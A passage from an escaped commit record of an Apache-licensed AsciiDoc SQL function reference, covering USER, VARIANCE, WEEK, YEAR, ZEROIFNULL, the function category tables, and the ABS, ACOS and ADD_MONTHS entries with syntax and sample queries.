level of a SELECT statement.\r\n* The value returned is string data type VARCHAR(128) and is in ISO8859-1 encoding.\r\n\r\n[[examples_of_user]]\r\n=== Examples of USER\r\n\r\n* This example shows the database user name of the current user who is\r\nlogged in to the session:\r\n+\r\n```\r\nSELECT USER FROM (values(1)) x(a);\r\n\r\n(EXPR)\r\n-------------------------\r\nTSHAW\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n* This example shows the database user name associated with the user ID number, 33333:\r\n+\r\n```\r\nSELECT USER (33333) FROM (values(1)) x(a);\r\n\r\n(EXPR)\r\n-------------------------\r\nDB ROOT\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[variance_function]]\r\n== VARIANCE Function\r\n\r\nVARIANCE is an aggregate function that returns the statistical variance\r\nof a set of numbers. VARIANCE is a {project-name} SQL extension.\r\n\r\n```\r\nVARIANCE ([ALL | DISTINCT] expression [, weight])\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe VARIANCE of the _expression_. The default option is ALL, which\r\ncauses duplicate values to be included. 
If you specify DISTINCT,\r\nduplicate values are eliminated before the VARIANCE function is applied.\r\nIf DISTINCT is specified, you cannot specify _weight_.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a numeric value expression that determines the values for\r\nwhich to compute the variance. _expression_ cannot contain an aggregate\r\nfunction or a subquery. The DISTINCT clause specifies that the VARIANCE\r\nfunction operates on distinct values from the one-column table derived\r\nfrom the evaluation of _expression_.\r\n\r\n* `_weight_`\r\n+\r\nspecifies a numeric value expression that determines the weights of the\r\nvalues for which to compute the variance. _weight_ cannot contain an\r\naggregate function or a subquery. _weight_ is defined on the same table\r\nas _expression_. The one-column table derived from the evaluation of\r\n_expression_ and the one-column table derived from the evaluation of\r\n_weight_ must have the same cardinality.\r\n\r\n[[considerations_for_variance]]\r\n=== Considerations for VARIANCE\r\n\r\n[[definition_of_variance]]\r\n==== Definition of VARIANCE\r\n\r\nSuppose that _vi_ are the values in the one-column table derived from\r\nthe evaluation of _expression_. _N_ is the cardinality of this\r\none-column table that is the result of applying the _expression_ to each\r\nrow of the source table and eliminating rows that are null.\r\n\r\nIf _weight_ is specified, _wi_ are the values derived from the\r\nevaluation of _weight_. _N_ is the cardinality of the two-column table\r\nthat is the result of applying the _expression_ and _weight_ to each row\r\nof the source table and eliminating rows that have nulls in either\r\ncolumn.\r\n\r\n===== Definition When Weight Is Not Specified\r\n\r\nIf _weight_ is not specified, the statistical variance of the values in\r\nthe one-column result table is defined as:\r\n\r\nvariance = SUM((vi - v)**2) \/ (N - 1)\r\n\r\nwhere _vi_ is the i-th value of _expression_, _v_ is the average value\r\nexpressed in the common data type, and _N_ is the cardinality of the\r\nresult table.\r\n\r\nBecause the definition of variance has _N-1_ in the denominator of the\r\nexpression (when weight is not specified), {project-name} SQL returns a\r\ndefault value of zero (and no error) if the number of rows in the table,\r\nor a group of the table, is equal to 1.\r\n\r\n===== Definition When Weight Is Specified\r\n\r\nIf _weight_ is specified, the statistical variance of the values in the\r\ntwo-column result table is defined as:\r\n\r\nvariance = SUM(wi * (vi - vw)**2) \/ N\r\n\r\nwhere _vi_ is the i-th value of _expression_, _wi_ is the i-th value of\r\n_weight_, _vw_ is the weighted average value expressed in the common\r\ndata type, and _N_ is the cardinality of the result table.\r\n\r\n===== Weighted Average\r\n\r\nThe weighted average _vw_ of _vi_ and _wi_ is defined as:\r\n\r\nvw = SUM(wi * vi) \/ SUM(wi)\r\n\r\nwhere _vi_ is the i-th value of _expression_, _wi_ is the i-th value of\r\n_weight_, and the sums run over the _N_ rows of the result table.\r\n\r\n
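As a worked illustration of the unweighted definition (not from the\r\noriginal manual): for the three values 2, 4, and 6, the average _v_ is 4,\r\nso the variance is ((2-4)**2 + (4-4)**2 + (6-4)**2) \/ (3 - 1) = 8 \/ 2 = 4.\r\n\r\n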
[[data_type_of_the_result]]\r\n==== Data Type of the Result\r\n\r\nThe data type of the result is always DOUBLE PRECISION.\r\n\r\n\r\n[[operands_of_the_expression]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result\r\ntable but cannot include an aggregate function. These expressions are\r\nvalid:\r\n\r\n```\r\nVARIANCE (SALARY)\r\nVARIANCE (SALARY * 1.1)\r\nVARIANCE (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[variance_nulls]]\r\n==== Nulls\r\n\r\nVARIANCE is evaluated after eliminating all nulls from the set. If the\r\nresult table is empty, VARIANCE returns NULL.\r\n\r\n\r\n[[float54_and_double_precision_data]]\r\n==== FLOAT(54) and DOUBLE PRECISION Data\r\n\r\nAvoid using large FLOAT(54) or DOUBLE PRECISION values as arguments to\r\nVARIANCE. If SUM(x * x) exceeds the value of 1.15792089237316192e77 during\r\nthe computation of VARIANCE(x), then a numeric overflow occurs.\r\n\r\n[[examples_of_variance]]\r\n=== Examples of VARIANCE\r\n\r\n* Compute the variance of the salary of the current employees:\r\n+\r\n```\r\nSELECT VARIANCE(salary) AS Variance_Salary FROM persnl.employee;\r\n\r\nVARIANCE_SALARY\r\n-------------------------\r\n 1.27573263588496116E+009\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Compute the variance of the cost of parts in the current inventory:\r\n+\r\n```\r\nSELECT VARIANCE (price * qty_available) FROM sales.parts;\r\n\r\n(EXPR)\r\n-------------------------\r\n 5.09652410092950336E+013\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[week_function]]\r\n== WEEK Function\r\n\r\nThe WEEK function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 54 that represents the\r\ncorresponding week of the year. If the year begins on a Sunday, the\r\nvalue 1 will be returned for any datetime that occurs in the first 7\r\ndays of the year. Otherwise, the value 1 will be returned for any\r\ndatetime that occurs in the partial week before the start of the first\r\nSunday of the year. The value 53 is returned for datetimes that occur in\r\nthe last full or partial week of the year except for leap years that\r\nstart on Saturday where December 31 is in the 54th full or partial week.\r\n\r\nWEEK is a {project-name} SQL extension.\r\n\r\n```\r\nWEEK (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_week]]\r\n=== Examples of WEEK\r\n\r\n* Return an integer that represents the week of the year from the\r\nSTART_DATE column in the PROJECT table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, WEEK(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- --------------\r\n2008-04-10 2008-04-21 08:15:00.000000 15\r\n```\r\n\r\n<<<\r\n[[year_function]]\r\n== YEAR Function\r\n\r\nThe YEAR function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value that represents the year.\r\n\r\nYEAR is a {project-name} SQL extension.\r\n\r\n```\r\nYEAR (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_year]]\r\n=== Examples of YEAR\r\n\r\n* Return an integer that represents the year from the start date column in\r\nthe project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, YEAR(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 2008\r\n```\r\n\r\n\r\n<<<\r\n[[zeroifnull_function]]\r\n== ZEROIFNULL Function\r\n\r\nThe ZEROIFNULL function returns a value of zero if the expression is\r\nNULL. Otherwise, it returns the value of the expression.\r\n\r\n```\r\nZEROIFNULL (expression)\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies a value expression. 
It must be a numeric data type.\r\n\r\n[[examples_of_zeroifnull]]\r\n=== Examples of ZEROIFNULL\r\n\r\n* ZEROIFNULL returns the value of the column named salary whenever the\r\ncolumn value is not NULL, and returns 0 whenever the column value is\r\nNULL:\r\n+\r\n```\r\nZEROIFNULL (salary)\r\n```\r\n\r\n","old_contents":"\/\/\/\/\r\n\/**\r\n* @@@ START COPYRIGHT @@@\r\n*\r\n* Licensed to the Apache Software Foundation (ASF) under one\r\n* or more contributor license agreements. See the NOTICE file\r\n* distributed with this work for additional information\r\n* regarding copyright ownership. The ASF licenses this file\r\n* to you under the Apache License, Version 2.0 (the\r\n* \"License\"); you may not use this file except in compliance\r\n* with the License. You may obtain a copy of the License at\r\n*\r\n* http:\/\/www.apache.org\/licenses\/LICENSE-2.0\r\n*\r\n* Unless required by applicable law or agreed to in writing,\r\n* software distributed under the License is distributed on an\r\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\r\n* KIND, either express or implied. See the License for the\r\n* specific language governing permissions and limitations\r\n* under the License.\r\n*\r\n* @@@ END COPYRIGHT @@@\r\n*\/\r\n\/\/\/\/\r\n\r\n[[sql_functions_and_expressions]]\r\n= SQL Functions and Expressions\r\n\r\nThis section describes the syntax and semantics of specific functions\r\nand expressions that you can use in {project-name} SQL statements. The\r\nfunctions and expressions are categorized according to their\r\nfunctionality.\r\n\r\n[[standard_normalization]]\r\n== Standard Normalization\r\n\r\nFor datetime functions, the definition of standard normalization is: If\r\nthe ending day of the resulting date is invalid, the day will be rounded\r\nDOWN to the last day of the result month.\r\n\r\n== Aggregate (Set) Functions\r\n\r\nAn aggregate (or set) function operates on a group or groups of rows\r\nretrieved by the SELECT statement or the subquery in which the aggregate\r\nfunction appears.\r\n\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<avg_function,AVG Function>> | Computes the average of a group of numbers derived from the evaluation\r\nof the expression argument of the function.\r\n| <<count_function,COUNT Function>> | Counts the number of rows that result from a query (by using\r\n*) or the number of rows that contain a distinct value in the one-column\r\ntable derived from the expression argument of the function (optionally\r\ndistinct values).\r\n| <<max_function,MAX\/MAXIMUM Function>> | Determines a maximum value from the group of values derived from the\r\nevaluation of the expression argument.\r\n| <<min_function,MIN Function>> | Determines a minimum value from the group of values derived from the\r\nevaluation of the expression argument.\r\n| <<stddev_function,STDDEV Function>> | Computes the statistical standard deviation of a group of numbers\r\nderived from the evaluation of the expression argument of the function.\r\nThe numbers can be weighted.\r\n| <<sum_function,SUM Function>> | Computes the sum of a group of numbers derived from the evaluation of\r\nthe expression argument of the function.\r\n| <<variance_function,VARIANCE Function>> | Computes the statistical variance of a group of numbers derived from the\r\nevaluation of the expression argument of the function. The numbers can\r\nbe weighted.\r\n|===\r\n\r\n\r\nColumns and expressions can be arguments of an aggregate function. 
The\r\nexpressions cannot contain aggregate functions or subqueries.\r\n\r\nAn aggregate function can accept an argument specified as DISTINCT,\r\nwhich eliminates duplicate values before the aggregate function is\r\napplied. See <<distinct_aggregate_functions,DISTINCT Aggregate Functions>>.\r\n\r\nIf you include a GROUP BY clause in the SELECT statement, the columns\r\nyou refer to in the select list must be either grouping columns or\r\narguments of an aggregate function. If you do not include\r\na GROUP BY clause but you specify an aggregate function in the select\r\nlist, all rows of the SELECT result table form the one and only group.\r\n\r\nSee the individual entry for the function.\r\n\r\n[[character_string_functions]]\r\n== Character String Functions\r\n\r\nThese functions manipulate character strings and use a character value\r\nexpression as an argument or return a result of a character data type.\r\nCharacter string functions treat each single-byte or multi-byte character\r\nin an input string as one character, regardless of the byte length of\r\nthe character.\r\n\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<ascii_function,ASCII Function>> | Returns the ASCII code value of the first character of a character value\r\nexpression.\r\n| <<char_function,CHAR Function>> | Returns the specified code value in a character set.\r\n| <<char_length_function,CHAR_LENGTH Function>> | Returns the number of characters in a string. You can also use\r\nCHARACTER_LENGTH.\r\n| <<code_value_function,CODE_VALUE Function>> | Returns an unsigned integer that is the code point of the first\r\ncharacter in a character value expression that can be associated with\r\none of the supported character sets.\r\n| <<concat_function,CONCAT Function>> | Returns the concatenation of two character value expressions as a string\r\nvalue. You can also use the concatenation operator (\\|\\|).\r\n| <<insert_function,INSERT Function>> | Returns a character string where a specified number of characters within\r\nthe character string have been deleted and then a second character\r\nstring has been inserted at a specified start position.\r\n| <<lcase_function,LCASE Function>> | Down-shifts alphanumeric characters. You can also use LOWER.\r\n| <<left_function,LEFT Function>> | Returns the leftmost specified number of characters from a character expression.\r\n| <<locate_function,LOCATE Function>> | Returns the position of a specified substring within a character string.\r\nYou can also use POSITION.\r\n| <<lower_function,LOWER Function>> | Down-shifts alphanumeric characters. 
You can also use LCASE.\r\n| <<lpad_function,LPAD Function>> | Replaces the leftmost specified number of characters in a character\r\nexpression with a padding character.\r\n| <<ltrim_function,LTRIM Function>> | Removes leading spaces from a character string.\r\n| <<octet_length_function,OCTET_LENGTH Function>> | Returns the length of a character string in bytes.\r\n| <<position_function,POSITION Function>> | Returns the position of a specified substring within a character string.\r\nYou can also use LOCATE.\r\n| <<repeat_function,REPEAT Function>> | Returns a character string composed of the evaluation of a character\r\nexpression repeated a specified number of times.\r\n| <<replace_function,REPLACE Function>> | Returns a character string where all occurrences of a specified\r\ncharacter string in the original string are replaced with another\r\ncharacter string.\r\n| <<right_function,RIGHT Function>> | Returns the rightmost specified number of characters from a character\r\nexpression.\r\n| <<rpad_function,RPAD Function>> | Replaces the rightmost specified number of characters in a character\r\nexpression with a padding character.\r\n| <<rtrim_function,RTRIM Function>> | Removes trailing spaces from a character string.\r\n| <<space_function,SPACE Function>> | Returns a character string consisting of a specified number of spaces.\r\n| <<substring_function,SUBSTRING\/SUBSTR Function>> | Extracts a substring from a character string.\r\n| <<translate_function,TRANSLATE Function>> | Translates a character string from a source character set to a target\r\ncharacter set.\r\n| <<trim_function,TRIM Function>> | Removes leading or trailing characters from a character string.\r\n| <<ucase_function,UCASE Function>> | Up-shifts alphanumeric characters. You can also use UPSHIFT or UPPER.\r\n| <<upper_function,UPPER Function>> | Up-shifts alphanumeric characters. You can also use UPSHIFT or UCASE.\r\n| <<upshift_function,UPSHIFT Function>> | Up-shifts alphanumeric characters. You can also use UPPER or UCASE.\r\n|===\r\n\r\nSee the individual entry for the function.\r\n\r\n[[datetime_functions]]\r\n== Datetime Functions\r\n\r\nThese functions use either a datetime value expression as an argument or\r\nreturn a result of datetime data type:\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<add_months_function,ADD_MONTHS Function>> | Adds the integer number of months specified by _intr_expr_ \r\nto _datetime_expr_ and normalizes the result.\r\n| <<converttimestamp_function,CONVERTTIMESTAMP Function>> | Converts a Julian timestamp to a TIMESTAMP value.\r\n| <<current_function,CURRENT Function>> | Returns the current timestamp. You can also use the\r\n<<current_timestamp_function,CURRENT_TIMESTAMP Function>>. \r\n| <<current_date_function,CURRENT_DATE Function>> | Returns the current date.\r\n| <<current_time_function,CURRENT_TIME Function>> | Returns the current time.\r\n| <<current_timestamp_function,CURRENT_TIMESTAMP Function>> | Returns the current timestamp. 
You can also use the <<current_function,CURRENT Function>>.\r\n| <<date_add_function,DATE_ADD Function>> | Adds the interval specified by _interval_expression_\r\nto _datetime_expr_.\r\n| <<date_part_function_of_an_interval,DATE_PART Function (of an Interval)>> | Extracts the datetime field specified by _text_ from the interval value\r\nspecified by interval and returns the result as an exact numeric value.\r\n| <<date_part_function_of_a_timestamp,DATE_PART Function (of a Timestamp)>> | Extracts the datetime field specified by _text_ from the datetime value\r\nspecified by timestamp and returns the result as an exact numeric value.\r\n| <<date_sub_function,DATE_SUB Function>> | Subtracts the specified _interval_expression_ from\r\n_datetime_expr._\r\n| <<date_trunc_function,DATE_TRUNC Function>> | Returns the date with the time portion of the day truncated.\r\n| <<dateadd_function,DATEADD Function>> | Adds the interval specified by _datepart_ and _num_expr_\r\nto _datetime_expr_.\r\n| <<datediff_function,DATEDIFF Function>> | Returns the integer value for the number of _datepart_ units of time\r\nbetween _startdate_ and _enddate_.\r\n| <<dateformat_function,DATEFORMAT Function>> | Formats a datetime value for display purposes.\r\n| <<day_function,DAY Function>> | Returns an integer value in the range 1 through 31 that represents the\r\ncorresponding day of the month. You can also use DAYOFMONTH.\r\n| <<dayname_function,DAYNAME Function>> | Returns the name of the day of the week from a date or timestamp\r\nexpression.\r\n| <<dayofmonth_function,DAYOFMONTH Function>> | Returns an integer value in the range 1 through 31 that represents the\r\ncorresponding day of the month. You can also use DAY.\r\n| <<dayofweek_function,DAYOFWEEK Function>> | Returns an integer value in the range 1 through 7 that represents the\r\ncorresponding day of the week.\r\n| <<dayofyear_function,DAYOFYEAR Function>> | Returns an integer value in the range 1 through 366 that represents the\r\ncorresponding day of the year.\r\n| <<extract_function,EXTRACT Function>> | Returns a specified datetime field from a datetime value expression or\r\nan interval value expression.\r\n| <<hour_function,HOUR Function>> | Returns an integer value in the range 0 through 23 that represents the\r\ncorresponding hour of the day.\r\n| <<juliantimestamp_function,JULIANTIMESTAMP Function>> | Converts a datetime value to a Julian timestamp.\r\n| <<minute_function,MINUTE Function>> | Returns an integer value in the range 0 through 59 that represents the\r\ncorresponding minute of the hour.\r\n| <<month_function,MONTH Function>> | Returns an integer value in the range 1 through 12 that represents the\r\ncorresponding month of the year.\r\n| <<monthname_function,MONTHNAME Function>> | Returns a character literal that is the name of the month of the year\r\n(January, February, and so on).\r\n| <<quarter_function,QUARTER Function>> | Returns an integer value in the range 1 through 4 that represents the\r\ncorresponding quarter of the year.\r\n| <<second_function,SECOND Function>> | Returns an integer value in the range 0 through 59 that represents the\r\ncorresponding second of the minute.\r\n| <<timestampadd_function,TIMESTAMPADD Function>> | Adds the interval of time specified by _interval-ind_ and\r\n_num_expr_ to _datetime_expr_.\r\n| <<timestampdiff_function,TIMESTAMPDIFF Function>> | Returns the integer value for the number of _interval-ind_\r\nunits of time between _startdate_ and _enddate_.\r\n| <<week_function,WEEK Function>> | Returns 
an integer value in the range 1 through 54 that represents the\r\ncorresponding week of the year.\r\n| <<year_function,YEAR Function>> | Returns an integer value that represents the year.\r\n|===\r\n\r\nSee the individual entry for the function.\r\n\r\n[[mathematical_functions]]\r\n== Mathematical Functions\r\n\r\nUse these mathematical functions within an SQL numeric value expression:\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<abs_function,ABS Function>> | Returns the absolute value of a numeric value expression. \r\n| <<acos_function,ACOS Function>> | Returns the arccosine of a numeric value expression as an angle expressed in radians.\r\n| <<asin_function,ASIN Function>> | Returns the arcsine of a numeric value expression as an angle expressed in radians.\r\n| <<atan_function,ATAN Function>> | Returns the arctangent of a numeric value expression as an angle expressed in radians.\r\n| <<atan2_function,ATAN2 Function>> | Returns the arctangent of the x and y coordinates, specified by two numeric value expressions, as an angle expressed in radians.\r\n| <<ceiling_function,CEILING Function>> | Returns the smallest integer greater than or equal to a numeric value expression.\r\n| <<cos_function,COS Function>> | Returns the cosine of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<crc32_function,CRC32 Function>> | Returns the CRC32 checksum.\r\n| <<cosh_function,COSH Function>> | Returns the hyperbolic cosine of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<degrees_function,DEGREES Function>> | Converts a numeric value expression expressed in radians to the number of degrees.\r\n| <<exp_function,EXP Function>> | Returns the exponential value (to the base e) of a numeric value expression.\r\n| <<floor_function,FLOOR Function>> | Returns the largest integer less than or equal to a numeric value expression.\r\n| <<log_function,LOG Function>> | Returns the natural logarithm of a numeric value expression.\r\n| <<log10_function,LOG10 Function>> | Returns the base 10 logarithm of a numeric value expression.\r\n| <<mod_function,MOD Function>> | Returns the remainder (modulus) of an integer value expression divided by an integer value expression.\r\n| <<nullifzero_function,NULLIFZERO Function>> | Returns the value of the operand unless it is zero, in which case it returns NULL.\r\n| <<pi_function,PI Function>> | Returns the constant value of pi as a floating-point value.\r\n| <<power_function,POWER Function>> | Returns the value of a numeric value expression raised to the power of an integer value expression. You can also use the exponential operator \*\*.\r\n| <<radians_function,RADIANS Function>> | Converts a numeric value expression expressed in degrees to the number of radians.\r\n| <<round_function,ROUND Function>> | Returns the value of _numeric_expr_ rounded to _num_ places to the right of the decimal point.\r\n| <<sign_function,SIGN Function>> | Returns an indicator of the sign of a numeric value expression. If value is less than zero, returns -1 as the indicator. If value is zero,\r\nreturns 0. 
[[sequence_functions]]\r\n== Sequence Functions\r\n\r\nSequence functions operate on ordered rows of the intermediate result\r\ntable of a SELECT statement that includes a SEQUENCE BY clause. Sequence\r\nfunctions are categorized generally as difference, moving, offset, or\r\nrunning.\r\n\r\nSome sequence functions, such as ROWS SINCE, require sequentially\r\nexamining every row in the history buffer until the result is computed.\r\nExamining a large history buffer in this manner for a condition that has\r\nnot been true for many rows could be an expensive operation. In\r\naddition, such operations may not be parallelized because the entire\r\nsorted result set must be available to compute the result of the\r\nsequence function.
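\r\nAs a minimal sketch of how sequence functions are used (assuming the PERSNL.EMPLOYEE sample table used elsewhere in this manual, with an EMPNUM column), a running sequence function operates on the rows ordered by the SEQUENCE BY clause:\r\n\r\n```\r\nSELECT empnum, salary, RUNNINGAVG(salary)\r\nFROM persnl.employee\r\nSEQUENCE BY empnum;\r\n```\r\n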
[[difference_sequence_functions]]\r\n=== Difference sequence functions\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<diff1_function,DIFF1 Function>> | Calculates differences between values of a column expression in the current row and previous rows.\r\n| <<diff2_function,DIFF2 Function>> | Calculates differences between values of the result of DIFF1 of the current row and DIFF1 of previous rows.\r\n|===\r\n\r\n[[moving_sequence_functions]]\r\n=== Moving sequence functions\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<movingcount_function,MOVINGCOUNT Function>> | Returns the number of non-null values of a column expression in the current window.\r\n| <<movingmax_function,MOVINGMAX Function>> | Returns the maximum of non-null values of a column expression in the current window.\r\n| <<movingmin_function,MOVINGMIN Function>> | Returns the minimum of non-null values of a column expression in the current window.\r\n| <<movingstddev_function,MOVINGSTDDEV Function>> | Returns the standard deviation of non-null values of a column expression in the current window.\r\n| <<movingsum_function,MOVINGSUM Function>> | Returns the sum of non-null values of a column expression in the current window.\r\n| <<movingvariance_function,MOVINGVARIANCE Function>> | Returns the variance of non-null values of a column expression in the current window.\r\n|===\r\n\r\n[[offset_sequence_function]]\r\n=== Offset sequence function\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<offset_function,OFFSET Function>> | Retrieves columns from previous rows.\r\n|===\r\n\r\n<<<\r\n[[running_sequence_functions]]\r\n=== Running sequence functions\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<runningavg_function,RUNNINGAVG Function>> | Returns the average of non-null values of a column expression up to and including the current row.\r\n| <<runningcount_function,RUNNINGCOUNT Function>> | Returns the number of rows up to and including the current row.\r\n| <<runningmax_function,RUNNINGMAX Function>> | Returns the maximum of values of a column expression up to and including the current row.\r\n| <<runningmin_function,RUNNINGMIN Function>> | Returns the minimum of values of a column expression up to and including the current row.\r\n| <<runningrank_function,RUNNINGRANK Function>> | Returns the rank of the given value of an intermediate result table ordered by a SEQUENCE BY clause in a SELECT statement.\r\n| <<runningstddev_function,RUNNINGSTDDEV Function>> | Returns the standard deviation of non-null values of a column expression up to and including the current row.\r\n| <<runningsum_function,RUNNINGSUM Function>> | Returns the sum of non-null values of a column expression up to and including the current row.\r\n| <<runningvariance_function,RUNNINGVARIANCE Function>> | Returns the variance of non-null values of a column expression up to and including the current row.\r\n|===\r\n\r\n[[other_sequence_functions]]\r\n=== Other sequence functions\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<lastnotnull_function,LASTNOTNULL Function>> | Returns the last non-null value for the specified column expression. 
If only null values have been returned, returns null.\r\n| <<rows_since_function,ROWS SINCE Function>> | Returns the number of rows counted since the specified condition was last true.\r\n| <<rows_since_changed_function,ROWS SINCE CHANGED Function>> | Returns the number of rows counted since the specified set of values last changed.\r\n| <<this_function,THIS Function>> | Used in ROWS SINCE to distinguish between the value of the column in the current row and the value of the column in previous rows.\r\n|===\r\n\r\nSee <<sequence_by_clause,SEQUENCE BY Clause>> and the individual entry for each function.\r\n\r\n<<<\r\n[[other_functions_and_expressions]]\r\n== Other Functions and Expressions\r\n\r\nUse these other functions and expressions in an SQL value expression:\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<authname_function,AUTHNAME Function>> | Returns the authorization name associated with the specified authorization ID number.\r\n| <<bitand_function,BITAND Function>> | Performs an AND operation on corresponding bits of the two operands.\r\n| <<case_expression,CASE (Conditional) Expression>> | A conditional expression. The two forms of the CASE expression are simple and searched.\r\n| <<cast_expression,CAST Expression>> | Converts a value from one data type to another data type that you specify.\r\n| <<coalesce_function,COALESCE Function>> | Returns the value of the first expression in the list that does not have a NULL value; if all the expressions have NULL values, the function returns a NULL value.\r\n| <<converttohex_function,CONVERTTOHEX Function>> | Converts the specified value expression to hexadecimal for display purposes.\r\n| <<current_user_function,CURRENT_USER Function>> | Returns the database user name of the current user who invoked the function.\r\n| <<decode_function,DECODE Function>> | Compares _expr_ to each _test_expr_ value one by one in the order provided.\r\n| <<explain_function,EXPLAIN Function>> | Generates a result table describing an access plan for a SELECT, INSERT, DELETE, or UPDATE statement.\r\n| <<isnull_function,ISNULL Function>> | Returns the first argument if it is not null, otherwise it returns the second argument.\r\n| <<is_ipv4_function, IS_IPV4 Function>> | Returns 1 if the argument is a valid IPv4 address specified as a string, 0 otherwise.\r\n| <<is_ipv6_function, IS_IPV6 Function>> | Returns 1 if the argument is a valid IPv6 address specified as a string, 0 otherwise.\r\n| <<inet_aton_function, INET_ATON Function>> | Given the dotted-quad representation of an IPv4 network address as a string, returns an integer that represents the numeric value of the address in network byte order (big endian). INET_ATON() returns NULL if it does not understand its argument.\r\n| <<inet_ntoa_function, INET_NTOA Function>> | Given a numeric IPv4 network address in network byte order, returns the dotted-quad string representation of the address as a nonbinary string in the connection character set. INET_NTOA() returns NULL if it does not understand its argument.\r\n| <<nullif_function,NULLIF Function>> | Returns the value of the first operand if the two operands are not equal, otherwise it returns NULL.\r\n| <<nvl_function,NVL Function>> | Returns the value of the first operand unless it is NULL, in which case it returns the value of the second operand.\r\n| <<user_function,USER Function>> | Returns either the database user name of the current user who invoked the function or the database user name associated with the specified user ID number.\r\n|===\r\n\r\nSee the individual entry for the function.
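\r\nAs a minimal sketch of the two IPv4 address conversions listed above (the value follows from the dotted-quad arithmetic 10*2^24 + 0*2^16 + 5*2^8 + 9 = 167773449; the inline-row idiom is the one used in other examples in this manual):\r\n\r\n```\r\nSELECT INET_ATON('10.0.5.9'), INET_NTOA(167773449) FROM (values(1)) x(a);\r\n```\r\n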
<<<\r\n[[abs_function]]\r\n== ABS Function\r\n\r\nThe ABS function returns the absolute value of a numeric value\r\nexpression. ABS is a {project-name} SQL extension.\r\n\r\n```\r\nABS (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the ABS function. The result is returned as an unsigned\r\nnumeric value if the precision of the argument is less than 10 or as a\r\nLARGEINT if the precision of the argument is greater than or equal to\r\n10. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_abs]]\r\n=== Examples of ABS\r\n\r\n* This function returns the value 8:\r\n+\r\n```\r\nABS (-20 + 12)\r\n```\r\n\r\n<<<\r\n[[acos_function]]\r\n== ACOS Function\r\n\r\nThe ACOS function returns the arccosine of a numeric value expression as\r\nan angle expressed in radians.\r\n\r\nACOS is a {project-name} SQL extension.\r\n\r\n```\r\nACOS (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the ACOS function. The range for the value of the argument is\r\nfrom -1 to +1. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_acos]]\r\n=== Examples of ACOS\r\n\r\n* The ACOS function returns the value 3.49044274380724416E-001 or\r\napproximately 0.3491 in radians (which is 20 degrees).\r\n+\r\n```\r\nACOS (0.9397)\r\n```\r\n\r\n* This function returns the value 0.3491. The function ACOS is the\r\ninverse of the function COS.\r\n+\r\n```\r\nACOS (COS (0.3491))\r\n```\r\n\r\n<<<\r\n[[add_months_function]]\r\n== ADD_MONTHS Function\r\n\r\nThe ADD_MONTHS function adds the integer number of months specified by\r\n_int_expr_ to _datetime_expr_ and normalizes the result. ADD_MONTHS is a {project-name} SQL\r\nextension.\r\n\r\n```\r\nADD_MONTHS (datetime-expr, int-expr [, int2])\r\n```\r\n\r\n* `_datetime_expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. The return value is the same type as the _datetime_expr_. See\r\n<<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n* `_int_expr_`\r\n+\r\nis an SQL numeric value expression of data type SMALLINT or INTEGER that\r\nspecifies the number of months. See <<numeric_value_expressions,\r\nNumeric Value Expressions>>.\r\n\r\n* `_int2_`\r\n+\r\nis an unsigned integer constant. If _int2_ is omitted or is the literal\r\n0, the normalization is the standard normalization. If _int2_ is the\r\nliteral 1, the normalization includes the standard normalization and if\r\nthe starting day (the day part of _datetime_expr_) is the last day of\r\nthe starting month, then the ending day (the day part of the result\r\nvalue) is set to the last valid day of the result month. See\r\n<<standard_normalization,Standard Normalization>>. 
